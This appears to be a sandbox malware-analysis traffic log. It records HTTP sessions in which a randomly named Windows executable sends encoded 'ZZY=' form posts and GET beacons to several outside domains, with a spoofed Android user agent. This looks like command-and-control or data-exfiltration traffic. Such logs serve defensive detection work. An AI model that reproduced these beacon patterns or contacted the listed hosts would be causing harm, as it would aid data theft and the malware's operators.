                                                                                                                Data Ascii: ZZY=x1xBjrAH9cnJ5O6f0ZJ7eN6Rav1zXcvyomp8VfLtrgN/AtLE7pZcf2d/zDmozQgIrEYlJIeI5MUsL9l4IsDIi1LkkqWLXw3+Lc4PdIBEz8t2o3N87jEyziJkGon1k57oq/LSTZZzBGSsAlxR/XuhQzEWf/ofKnbmGNlNr7udJXvmyXxParrI0MfE7l1mr3SeiOeKL/JeH2uW2Y5hd2KMul/T/gOs3Fcal3rUhQ6J7jLildsQaSUY2YSLLyxP18vR7refl/MwmqCIRGfdctZywiKU9I8gGDzIuw4JT48RXoPvwSBCg/OWCwzSpIcYZHcNDQDWeJGxpLN0uNrsAxfz9418KLfZzCigw2WRK92SEdB7kr4+tfxSV1uYY1KdZHdg2RP7lCOj+iKD/4fOgFmLGisjOL5NyM17Kj6kHgKc/G5b9QWwyuO3SwUQxzjyy/5krFE3TD1ifwbSgLHkJWxxBoxx4Uo92jdeURUn5G+p0H+D/VhvimJR2Y19ALQIMWX5xD7+vnlVGYfl0dzV506tZkmPw+UQ4f7wW3HJUNEsjdeCbYbel5r02rDbbRl2rQ7901n/jdKIqesv3EJt691A/H7n2VBcpAu43TBmAx1TdOT2ZyKHGX+0f8o7X0BvAfobKrIvbiuYPiriotJEs9q8k+Ej+NyMBFltmpnVY23lVeOnKNOl1rDeqrSPdvXGkKQQn2bZHMySGyPAcl6QYBYlkXUyL6KDle5JT4grsorHA0kqekdDKDYeW8dDvLHLUrsrPs5jRzsDUla8LqklPEARCD04V1M4WGf66oJCtw5pBMEY39gNxt6V0UNT65WnnlKoxDyXGN7P2CLLsfv0OmgnspobxgKkCD0SYL2+VBE/HPpaxx9x4Y2CyWLG1gLDjTRaUtXHX3/aumGEcGjAYQ3SlNYAVjJNKNisM+lbGt2d66KIo638OquvJh3LYtJY/fYJ9K8lK1UI7Xfvu0RORAmCmLD0R9elwEb/67nDlxk9dotUfU4S [TRUNCATED]


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                36192.168.2.7500083.33.130.190801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:08:33.405251980 CEST424OUTGET /fvi9/?ZZY=83Zhgfg6tu/foMGa1rd4G8mvZ8J0ctT1sQtAA8307wl6fpXmtYNgS0h47hPctXYzi3krAK+TuMk8NNNUc7/zlizFi4+uLzj6JeI9HOwnvOMl9isW4EM/0itfBtO8+qbotuSJUZ1vI2TR&mHm0o=rrqhoH HTTP/1.1
                                                                                                                Host: www.consultarfacil.online
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Connection: close
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Oct 9, 2024 14:08:33.861129999 CEST412INHTTP/1.1 200 OK
                                                                                                                Server: openresty
                                                                                                                Date: Wed, 09 Oct 2024 12:08:33 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 272
                                                                                                                Connection: close
                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5a 5a 59 3d 38 33 5a 68 67 66 67 36 74 75 2f 66 6f 4d 47 61 31 72 64 34 47 38 6d 76 5a 38 4a 30 63 74 54 31 73 51 74 41 41 38 33 30 37 77 6c 36 66 70 58 6d 74 59 4e 67 53 30 68 34 37 68 50 63 74 58 59 7a 69 33 6b 72 41 4b 2b 54 75 4d 6b 38 4e 4e 4e 55 63 37 2f 7a 6c 69 7a 46 69 34 2b 75 4c 7a 6a 36 4a 65 49 39 48 4f 77 6e 76 4f 4d 6c 39 69 73 57 34 45 4d 2f 30 69 74 66 42 74 4f 38 2b 71 62 6f 74 75 53 4a 55 5a 31 76 49 32 54 52 26 6d 48 6d 30 6f 3d 72 72 71 68 6f 48 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZZY=83Zhgfg6tu/foMGa1rd4G8mvZ8J0ctT1sQtAA8307wl6fpXmtYNgS0h47hPctXYzi3krAK+TuMk8NNNUc7/zlizFi4+uLzj6JeI9HOwnvOMl9isW4EM/0itfBtO8+qbotuSJUZ1vI2TR&mHm0o=rrqhoH"}</script></head></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                37192.168.2.750009206.119.82.134801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:08:39.081228971 CEST665OUTPOST /0cbg/ HTTP/1.1
                                                                                                                Host: www.40wxd.top
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.40wxd.top
                                                                                                                Content-Length: 216
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.40wxd.top/0cbg/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 63 63 39 69 78 45 65 6e 50 47 65 6f 41 52 77 75 4a 76 53 66 68 61 37 54 55 6a 64 59 41 47 61 54 70 69 37 72 4a 56 79 41 46 58 79 52 6b 47 54 54 6a 66 58 5a 49 49 54 48 41 4e 76 74 6b 43 30 35 38 6c 55 6d 54 78 66 36 45 76 59 38 6b 48 6a 62 6b 72 4f 47 62 4f 72 43 33 6b 6f 34 2b 39 79 31 77 67 6d 56 77 65 41 74 77 70 37 59 59 54 64 7a 56 46 54 31 49 76 74 77 66 53 4f 50 34 33 67 4d 77 53 2f 35 64 67 35 79 61 30 73 6f 74 76 30 2f 37 31 76 2f 55 5a 30 78 39 6c 48 32 4f 74 46 50 58 32 44 4a 43 6e 50 67 48 58 77 31 4c 71 68 2b 59 33 68 70 2b 46 4a 70 63 63 6f 38 61 45 45 4c 61 79 59 7a 42 77 51 4d 79 34 46 52 58 39 64 69 4b 67 3d 3d
                                                                                                                Data Ascii: ZZY=cc9ixEenPGeoARwuJvSfha7TUjdYAGaTpi7rJVyAFXyRkGTTjfXZIITHANvtkC058lUmTxf6EvY8kHjbkrOGbOrC3ko4+9y1wgmVweAtwp7YYTdzVFT1IvtwfSOP43gMwS/5dg5ya0sotv0/71v/UZ0x9lH2OtFPX2DJCnPgHXw1Lqh+Y3hp+FJpcco8aEELayYzBwQMy4FRX9diKg==
                                                                                                                Oct 9, 2024 14:08:39.958683968 CEST691INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx
                                                                                                                Date: Wed, 09 Oct 2024 12:08:39 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 548
                                                                                                                Connection: close
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                38192.168.2.750010206.119.82.134801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:08:41.623748064 CEST685OUTPOST /0cbg/ HTTP/1.1
                                                                                                                Host: www.40wxd.top
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.40wxd.top
                                                                                                                Content-Length: 236
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.40wxd.top/0cbg/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 63 63 39 69 78 45 65 6e 50 47 65 6f 42 77 67 75 4c 4d 4b 66 77 36 37 55 4b 54 64 59 50 6d 61 58 70 6a 48 72 4a 57 2b 51 46 69 61 52 6c 6d 44 54 67 65 58 5a 4a 49 54 48 4b 74 76 73 72 69 30 45 38 6c 59 75 54 78 6a 36 45 76 63 38 6b 44 76 62 6c 59 57 46 62 65 72 41 2f 45 6f 2b 7a 64 79 31 77 67 6d 56 77 66 6b 58 77 70 7a 59 62 6a 42 7a 55 6e 37 32 4c 76 74 33 57 79 4f 50 38 33 67 51 77 53 2f 62 64 6c 67 58 61 78 6f 6f 74 75 45 2f 2f 78 44 38 64 5a 30 33 77 46 47 45 4e 38 6b 41 58 30 4b 37 48 6d 4c 65 4b 67 6b 4b 48 38 38 63 43 56 74 46 67 55 78 53 59 65 4d 4b 4e 69 5a 2b 59 7a 63 72 4d 53 6b 74 74 50 67 37 61 76 38 6d 63 63 39 53 33 77 64 66 79 71 55 51 46 64 39 4d 58 39 64 69 6c 48 6b 3d
                                                                                                                Data Ascii: ZZY=cc9ixEenPGeoBwguLMKfw67UKTdYPmaXpjHrJW+QFiaRlmDTgeXZJITHKtvsri0E8lYuTxj6Evc8kDvblYWFberA/Eo+zdy1wgmVwfkXwpzYbjBzUn72Lvt3WyOP83gQwS/bdlgXaxootuE//xD8dZ03wFGEN8kAX0K7HmLeKgkKH88cCVtFgUxSYeMKNiZ+YzcrMSkttPg7av8mcc9S3wdfyqUQFd9MX9dilHk=
                                                                                                                Oct 9, 2024 14:08:42.498958111 CEST691INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx
                                                                                                                Date: Wed, 09 Oct 2024 12:08:42 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 548
                                                                                                                Connection: close
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                39192.168.2.750011206.119.82.134801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:08:44.548331022 CEST1698OUTPOST /0cbg/ HTTP/1.1
                                                                                                                Host: www.40wxd.top
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.40wxd.top
                                                                                                                Content-Length: 1248
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.40wxd.top/0cbg/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 63 63 39 69 78 45 65 6e 50 47 65 6f 42 77 67 75 4c 4d 4b 66 77 36 37 55 4b 54 64 59 50 6d 61 58 70 6a 48 72 4a 57 2b 51 46 69 43 52 6b 51 50 54 6e 4e 76 5a 62 34 54 48 4a 74 76 78 72 69 30 6a 38 6c 51 71 54 78 76 71 45 74 55 38 69 6d 7a 62 69 74 36 46 55 65 72 41 67 30 6f 2f 2b 39 7a 74 77 67 57 52 77 66 30 58 77 70 7a 59 62 68 31 7a 58 31 54 32 4e 76 74 77 66 53 4f 4c 34 33 67 73 77 54 58 68 64 6b 56 69 61 69 51 6f 74 4f 55 2f 35 55 76 38 41 70 30 31 31 46 47 63 4e 38 70 41 58 30 58 43 48 6d 76 30 4b 6e 49 4b 48 36 78 59 51 6b 42 56 39 46 4e 4a 61 74 38 38 4e 41 78 44 54 31 55 2f 4c 6c 49 53 6e 34 6f 35 53 50 63 30 65 49 51 76 67 41 6b 73 78 71 59 7a 49 35 73 49 4c 74 74 31 35 41 56 45 6a 75 50 39 52 32 6e 79 64 4a 30 4a 33 62 33 61 33 38 32 63 53 58 53 69 57 77 69 4d 31 64 4e 31 63 6f 48 4c 70 74 4b 45 67 33 4b 39 52 4f 78 67 76 46 77 47 38 75 43 6b 6b 42 74 70 54 38 33 65 48 53 73 4c 75 38 46 45 69 64 44 42 78 63 6c 37 69 39 56 5a 76 78 32 4b 62 47 4f 41 34 43 63 6a 49 74 35 49 6e 2b [TRUNCATED]
                                                                                                                Data Ascii: ZZY=cc9ixEenPGeoBwguLMKfw67UKTdYPmaXpjHrJW+QFiCRkQPTnNvZb4THJtvxri0j8lQqTxvqEtU8imzbit6FUerAg0o/+9ztwgWRwf0XwpzYbh1zX1T2NvtwfSOL43gswTXhdkViaiQotOU/5Uv8Ap011FGcN8pAX0XCHmv0KnIKH6xYQkBV9FNJat88NAxDT1U/LlISn4o5SPc0eIQvgAksxqYzI5sILtt15AVEjuP9R2nydJ0J3b3a382cSXSiWwiM1dN1coHLptKEg3K9ROxgvFwG8uCkkBtpT83eHSsLu8FEidDBxcl7i9VZvx2KbGOA4CcjIt5In+cCCsXag3feTyGJDq3cdiAsiCZlaMA7ksFrQgSPLSVZ4TzI0MrUsz4s+VfBcctoHY08JkSV6vvKrN7a9biE354iUTPPHMnZuBjAq2bnN1HgdzuHRAHDywO6MxUpFOW6XqKs4ORwPHGaLEgAaIU2aspcq0yVzq7Ir16NnqpK+B8Sy3SJTViwiM4IDKP9ZxDlF1vdtB47ia79Zq06qBs4m0I5NggMoVEntXluminbFAfkez1waTKJfSYPkYsTUM7ZQFCXfJxUrwDs+nsRHOtBvzVoxLNh7pXKxrUWSYZbq95itYHqhnodKAsopzSbiQPNvSHeQH//klLqxFJk8ILK+o1OJPLKqn2XuylHnPJBouflE6pufalG0p49k3bjPABLrrAyzG0RX74fA1oofxN6FzScUIHosADrIiw/rNabi4e9jMbJ9lZbZXcGczsAj/cw2CNkqxKp5P86WD+wT+Ob+3TnTI/wcqWvIbraBYM2eaFYCqZN+MUdocHjS1r3MY4HJCCLjxcKoUtrlBylhP6oh1KIl0wdjI6y9tAihifshabarQ9W4eRsstJd7RQNXCJhsZESZ/Y61dBCPz8GgdO2ItX244BfCwfh1V2aBFjU9dVkBqHTlez4Y4DVgPa5zfayHTgE7A0uvENG9/mr1O+apQGqfOYoT1Y+DRuU [TRUNCATED]


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                40192.168.2.750012206.119.82.134801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:08:47.089133978 CEST412OUTGET /0cbg/?ZZY=ReVCyzq7e32zPSksEOCt3pbKcx4rKGTIyRipE0uGIQ28zkTth8noQJXIJc3ts0ISqVogbi/TYpoiqGzNpNOIXMLKx0kCr+Xw6Q+8qepVva7bCGUCYF3oCYt7aX6G3loK+iyEYGVwNCt0&mHm0o=rrqhoH HTTP/1.1
                                                                                                                Host: www.40wxd.top
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Connection: close
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Oct 9, 2024 14:08:47.992333889 CEST691INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx
                                                                                                                Date: Wed, 09 Oct 2024 12:08:47 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 548
                                                                                                                Connection: close
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                41192.168.2.7500133.33.130.190801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:08:53.050594091 CEST695OUTPOST /eysm/ HTTP/1.1
                                                                                                                Host: www.allthingsjasmin.com
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.allthingsjasmin.com
                                                                                                                Content-Length: 216
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.allthingsjasmin.com/eysm/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 6d 6b 74 47 62 69 64 57 7a 41 47 65 52 62 61 78 68 2f 71 61 41 43 79 38 50 4d 4a 31 72 75 73 67 59 76 51 63 6b 32 67 67 35 47 62 4b 42 61 45 51 69 37 6a 51 33 4c 68 75 4c 6d 70 51 58 41 75 32 68 6b 4f 65 48 31 34 35 54 4d 44 2b 47 30 6c 6d 46 56 4b 47 6d 70 51 73 56 58 35 6d 63 4e 64 4c 74 4b 32 37 52 46 70 6b 5a 33 77 64 56 32 4d 49 4e 63 4e 6a 55 4d 78 48 54 77 62 30 6d 55 33 63 75 32 57 42 73 68 44 75 57 79 38 45 6e 69 72 6f 62 31 6c 76 2f 54 74 6d 4a 56 47 59 6e 6b 61 79 32 47 7a 68 70 36 55 7a 55 6c 74 34 48 4f 4e 75 31 76 66 2b 33 71 45 79 73 6c 66 65 69 4d 37 4d 57 4b 2f 56 4d 36 77 70 39 43 42 45 56 64 49 56 6d 51 3d 3d
                                                                                                                Data Ascii: ZZY=mktGbidWzAGeRbaxh/qaACy8PMJ1rusgYvQck2gg5GbKBaEQi7jQ3LhuLmpQXAu2hkOeH145TMD+G0lmFVKGmpQsVX5mcNdLtK27RFpkZ3wdV2MINcNjUMxHTwb0mU3cu2WBshDuWy8Enirob1lv/TtmJVGYnkay2Gzhp6UzUlt4HONu1vf+3qEyslfeiM7MWK/VM6wp9CBEVdIVmQ==


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                42192.168.2.7500143.33.130.190801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:08:55.593177080 CEST715OUTPOST /eysm/ HTTP/1.1
                                                                                                                Host: www.allthingsjasmin.com
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.allthingsjasmin.com
                                                                                                                Content-Length: 236
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.allthingsjasmin.com/eysm/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 6d 6b 74 47 62 69 64 57 7a 41 47 65 44 76 6d 78 79 73 53 61 58 79 79 37 57 38 4a 31 77 2b 73 73 59 76 4d 63 6b 33 6c 37 2b 79 33 4b 42 2b 41 51 6a 35 4c 51 30 4c 68 75 54 57 70 4d 59 67 75 35 68 6b 4c 68 48 77 41 35 54 50 2f 2b 47 78 5a 6d 46 6d 79 5a 30 70 51 71 4e 6e 35 6b 52 74 64 4c 74 4b 32 37 52 46 74 65 5a 33 49 64 57 43 77 49 4c 39 4e 67 64 73 78 47 55 77 62 30 77 6b 33 59 75 32 58 73 73 6c 6a 55 57 77 30 45 6e 69 37 6f 61 6b 6c 73 6d 6a 74 73 57 6c 48 36 6f 55 7a 6a 79 44 58 35 6a 62 63 62 53 79 5a 62 47 34 51 4d 76 4e 54 53 70 37 38 4a 6f 6e 37 6f 31 71 6d 35 55 4c 37 4e 42 59 45 49 69 31 6b 75 59 50 70 52 77 71 43 4b 6a 78 6d 45 68 5a 42 74 2b 6d 6b 67 38 62 37 48 77 37 34 3d
                                                                                                                Data Ascii: ZZY=mktGbidWzAGeDvmxysSaXyy7W8J1w+ssYvMck3l7+y3KB+AQj5LQ0LhuTWpMYgu5hkLhHwA5TP/+GxZmFmyZ0pQqNn5kRtdLtK27RFteZ3IdWCwIL9NgdsxGUwb0wk3Yu2XssljUWw0Eni7oaklsmjtsWlH6oUzjyDX5jbcbSyZbG4QMvNTSp78Jon7o1qm5UL7NBYEIi1kuYPpRwqCKjxmEhZBt+mkg8b7Hw74=


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                43192.168.2.7500153.33.130.190801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:08:58.138783932 CEST1728OUTPOST /eysm/ HTTP/1.1
                                                                                                                Host: www.allthingsjasmin.com
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.allthingsjasmin.com
                                                                                                                Content-Length: 1248
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.allthingsjasmin.com/eysm/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
